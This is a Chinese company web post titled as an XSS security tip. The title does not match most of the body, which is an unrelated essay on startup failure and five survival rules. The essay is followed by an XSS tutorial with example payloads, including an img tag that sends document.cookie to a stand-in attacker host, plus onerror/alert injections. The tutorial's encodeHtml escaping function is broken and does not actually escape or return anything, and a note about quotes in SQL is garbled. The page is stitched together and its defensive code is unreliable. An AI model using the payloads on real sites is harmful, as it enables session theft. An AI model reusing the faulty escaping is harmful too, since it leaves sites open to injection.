IT之道-艾锑知道

您当前位置: 主页 > 资讯动态 > 艾锑分享 >

艾锑无限安全提示:跨站攻击(XSS)及防御


2020-03-10 11:52 作者:admin 浏览量:
中小微企业生存的五大法则
 
据不完全统计,中国有近5000万家中小微企业,这个数据随着互联网的发展还在持续增长,但这些企业的存活率是非常低的,60%的初创企业活不过1年,30%的初创企业活不过3年,还有超过9%的企业只有5年左右的生存期,剩下不到1%的企业活过5年以上,幸运的可以达到10年,甚至更长一些.
 
为什么中小微企业的存活率这么低呢?
透过成千上万的失败案例,我们总结了以下五大方面的原因:
 
第一,创业失败创始人难辞其咎,我们在学校里是没有一堂课是教如何创业,如何才能创业成功,即使现在有很多大学尝试着在学校开办一些创业的课程,也不系统,更不专业,因为创业是一件极其复杂的工作,是需要多项技能的集合以及熟练的运用才有可能应对突如其来的变化,创业初期就像一艘孤独的小船面对波涛汹涌的大海,但船长从来都没有开过任何一艘船驶出过海港,风浪来的时候,只有慌张和恐惧,最后被海水吞没.
 
第二,创业失败是价值观不统一,方向不一致,团队不团结,风平浪静,风和日丽,其实没什么关系,大家都在享受阳光带来的美好和快乐,只有遇到风浪,生死攸关或个人利益受到极大冲突时,人性的弱点才会突显,当每个人只盯着个人得失或眼光短浅时,如果这个时候创始人没有力挽狂澜,强大的信念和人格魅力来一统所有人的行动准则,在危机中迟疑,就等于在死神面前跳舞,当年阿里的“中国供应商”客户涉嫌欺诈事件,如果不是马云明察秋毫,当即立断,我相信也不会有今天阿里世界霸主的地位.
 
第三,创业失败是固步自封,看不见高山,如果我们只能看见自己的山最高,没有走出去,没有学习的心态,没有敬畏之心,很快时代就会把我们淘汰,当年的诺基亚,柯达就是最好的例子.无论企业多大,都要有一颗创业的心,永远相信还能做的更好,还可以再创新,还会想出其它的可能性.真正的对手不在外面,而在我们心中,心中无敌,才能无敌于天下.
 
第四,创业失败是误解了”客户是上帝”,上帝并不是时时都知道自己要什么,我们不能只限于客户表面的表达就决定了他们的需求,很多企业死就死在客户的假需求中,看起来好像是客户追求的产品,需要的服务,但实际当产品生产出来,当服务送到客户面前,并没有真正吸引到客户的注意,愿意为此而买单,核心本质就是我们曲解了”客户是上帝”这句话,真正的上帝是不会当自己是至高无上的,也不会对品质无底限的追求,更不会对服务没有节制要求,其实客户就是客户,他们绝大部分人都是普通人,有着普通人的欲望,有着普通人的不满足,有着普通人想要花更少的钱却要得到更多的意识,他们的只忠诚于更便宜更高的品质,这一切都是企业需要认知到的本质,不然你的”上帝”是不会为你持续付费的.
 
第五,创业失败是讲多了人情讲少了制度,公司小,三五个人可以不需要任何制度,甚至也不需要任何系统,因为那时彼此联结非常深,情感的能量可以唤醒每个人的斗志和决心 ,但当企业发展到几十个人甚至几百个人时,那种深深的联结感很难在感受到,人性的弱点就会被环境所唤醒,就会被利益所绑架,就会被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最终是服务于人,只有促进发展的制度,可能激励人性向善的制度才能长久, 反之亦然.
如果你想想创立一家公司?
如果你是一家刚刚开始创业的公司?
如果你现在在创业的过程中遇到了挑战?
 
结合上面的五大常见创业失败,我们总结出来了五个可以让你有更大成功机率的法则,可以让你活的更久一些,但不保证你一定成功,因为事事变化,因缘和合,万法无常,只能随机而变.
 
第一法则:准备自己
创始人需要自我审视,首先要准备好自我牺牲的精神,要做好大海有风暴的思想准备,其次利用一切可以实践的机会去锻炼自己的综合能力,不仅仅相信前辈和书本的声音,更需要相信实战后带来的思考和反思.即要有远大的理想和抱负,又要有脚踏实地做好每一件事的决心.
 
第二法则:认识自我
创始人要极早的认识自我,想清楚为什么要创业比创业更重要,清晰明确的了解自己的价值是什么?什么是自己会坚持的,什么是自己抗拒的,混乱的价值观就会吸引五花八门的人,企业内部的斗争都是创始人自己思想的斗争,初创企业所呈现出来的一切现象都是创始人内在的显化.当年阿里快速成长,内部也出现了一系列的问题,但极其智慧的马云没有去解决这些问题,反而把自己关在道观中整整7天,最后终于想明白了三个问题:我要什么,我有什么,我要放弃什么,当他想清晰这三个问题后,并向全公司传递出来,最后所有那些纷繁复杂的问题都不解自明.
第三法则:持续打开
创始人的天花板就是企业的天花板,企业无法突破,就是创始人没有突破自己,突破其实不容易,因为固有的观念就像万里长城一样,非一日之功,是多少个春夏秋冬,严寒酷暑的积累和沉淀,这些不是没有价值,而是帮助过我们创了价值,让我们来到了今天这一步,但如果我们期望有一个更大的世界,就需要放下它们,放下我们曾经一直的坚持和执着,打开自己,让自己接纳一个全新的可能性,也许过不了多久,我们又会把这些新的东西奉为圭臬但只要我们还想看到一个更大的可能性,就需要再次打开自己,重新建立认知,我们一生都是在打开和重建过程中,直到生命的终结,又一切回归原点.
 
第四法则:回归本质
创始人刚开始需要和团队一起参与战斗,甚至做具体细节工作,因为初创需要激情来点燃,而创始人是这个团队最有激情的一个人,初创团队需要有人带动去点燃更大的燃料.当所有团队和部门走向正轨时,创始人更大的价值是深度的思考,有效的区分,精神的引领和正确的选择.
企业越来越大,事情就会越来越多,如果没有一个清醒的大脑保持深度的思考,就像让企业很多人很忙,忙是一种现象,并不代表有价值,只有透过深度思考发现事物的本质,才知道忙什么才是最重要的,
懂得有效的区分是一个领导者必须掌握的能力, 《尼布尔的祈祷文》说:”上帝,请赐予我平静,去接受我无法改变的。给予我勇气,去改变我能改变的,赐我智慧,分辨这两者的区别。”只有具备分辨的智慧,才不会让自己误入歧途.
创始人要有强大的精神力量,让所有员工感受到这股力量,因为所有的成功都离不开一个伟大的精神领袖,就像苹果的乔布斯,微软的比尔盖茨和阿里的马云.
选择比努力更重要,这句话告诉我们顺势而为的选择可以让我们在同样的努力情况下获得不同的结果,如何才能具备这样明智选择的能力呢,强大的深度思考能力和有效的区分能力就可以帮到我们看见正确的选择.
 
第五法则:创造系统
创始人是人,是人就会有七情六欲,就会有生老病死,就会有悲欢离合,这些人性的因素会让我们很不稳定,但企业能持久有效的运转一定是在稳定的能量下运行,所以不能始终靠人来推动,企业想要活的久一定是有内生的系统,只有建立一个自动运转的系统才能保持稳定健康的成长.
以上的分享像从管子里看豹,只看见豹身上的一块花斑,看不到全豹,以此抛砖引玉,希望有更多人可以把自己创业的经历和经验分享出来,从而让我们更全面的看见一家企业怎样做才能活得久,活的好,活的更有价值.
 
1.艾锑无限安全提示:跨站攻击(XSS)及防御
 
 
1. XSS的含义
 顾名思义,就是向web页面或者网站的url添加恶意的script(脚本)代码,使用户访问该网站时,执行恶意代码,从而达到攻击的目的。
发生XSS的场景:
1. 网站对用户的输入过滤不足,返回给用户的展示结果过滤不足。
2. 网站的链接地址未经过过滤
2. 如何进行攻击
攻击种类多种多样,通常包含如下:
1. 向网站注入脚本,获取访问用户的cookie或者其他会话信息(session information)等私有数据
2. 通过注入脚本,将受害者的网页重定向到攻击者控制的网页
3. 通过注入脚本,在用户的计算机上执行其他恶意操作 
3. XSS攻击分类
 XSS攻击分为3类: 存储型(持久型)、反射型(非持久型)、基于DOM型。危害程度递减。
 存储型(Stored/Persistent XSS Attacks)
 危害程度最大,可能危及所有用户!
 注入的脚本永久的存储在目标服务器中。当浏览器发送数据请求时,受害者和网站的其他用户都会再次拿到恶意脚本。
 <示例>:
网站的评论功能
评论提交后,存储到服务器。所有访问该网站的用户自动从服务器拉取到恶意代码。 
// 在评论框中输入恶意脚本,提交到服务器
hello<script>广告等</script>
反射型(Reflected/Non-Persistent XSS Attacks)
 一般只危害当前操作用户 
诱骗用户点击恶意链接、提交一个被篡改过的表单、浏览恶意网站,将恶意代码注入到访问者的网站。
web服务器将注入的脚本反射到用户的浏览器,比如通过错误信息、查询结果等返回浏览器。
浏览器会执行这些恶意代码,因为它假定响应来自于已经交互过的“受信任的”服务器。
<示例>: 
在<img>的url上写入一个脚本,将本地的cookie通过访问地址发送到攻击者的服务器
<img src=`http://www.fish.com:81?cookie=${document.cookie}` />
基于DOM型(DOM-based XSS Attacks)
攻击最小,一般通过操作浏览器脚本的DOM对象,修改DOM节点属性,在DOM节点插入闭合标签等,进行攻击。
<示例>:
通过输入框给图片的src赋值,展示图片
        <input type="text" id="web" /> <button id="add">添加图片</button>
        <div class="box"></div>
        <script src="/node_modules/jquery/dist/jquery.js"></script>
        <script>
            // 不基于后端, 基于DOM,通过修改属性、插入内容、document.write    
            // 改变结构后造成攻击
            // 攻击的内容成为xss payload           
            $("#add").on('click', function() {
                // <img src="" onerror="alert(1)" id=""/>
                // " onerror="alert(1)" id="
                // <img src=""><script>alert(1)<\/script>"">   
                // "><script>alert(1)<\/script>"
                $(".box").html(`<img src=${$('#web').val()} />`)
            })
        </script>
 
 4. 如何避免攻击
所有的攻击归根结底都是该过滤的没有过滤,该转义的没有转义。比较完整的避免攻击方式,需要做以下三步:
1. 客户端传递给服务器时,需要校验先过滤一下。
   这个方法不能解决问题,因为攻击者可能会模拟ajax请求。
2. 服务器端再过滤一下
3. 直接在输出的时候过滤
4. HttpOnly: 防止js读取cookie后传递到第三方
过滤方法:
 
        function encodeHtml(str) {
            str.replace(/&/g, '&').
            replace(/'/g, '"').
            replace(/"/g, ''').
            replace(/</g, '<').replace(/>/g, '>')
        }
 
对于单引号或双引号,如果输入内容用于后台或者本地存储的sql拼接,会导致死循环等恶意结果。
 
 

相关文章

IT外包服务
二维码 关闭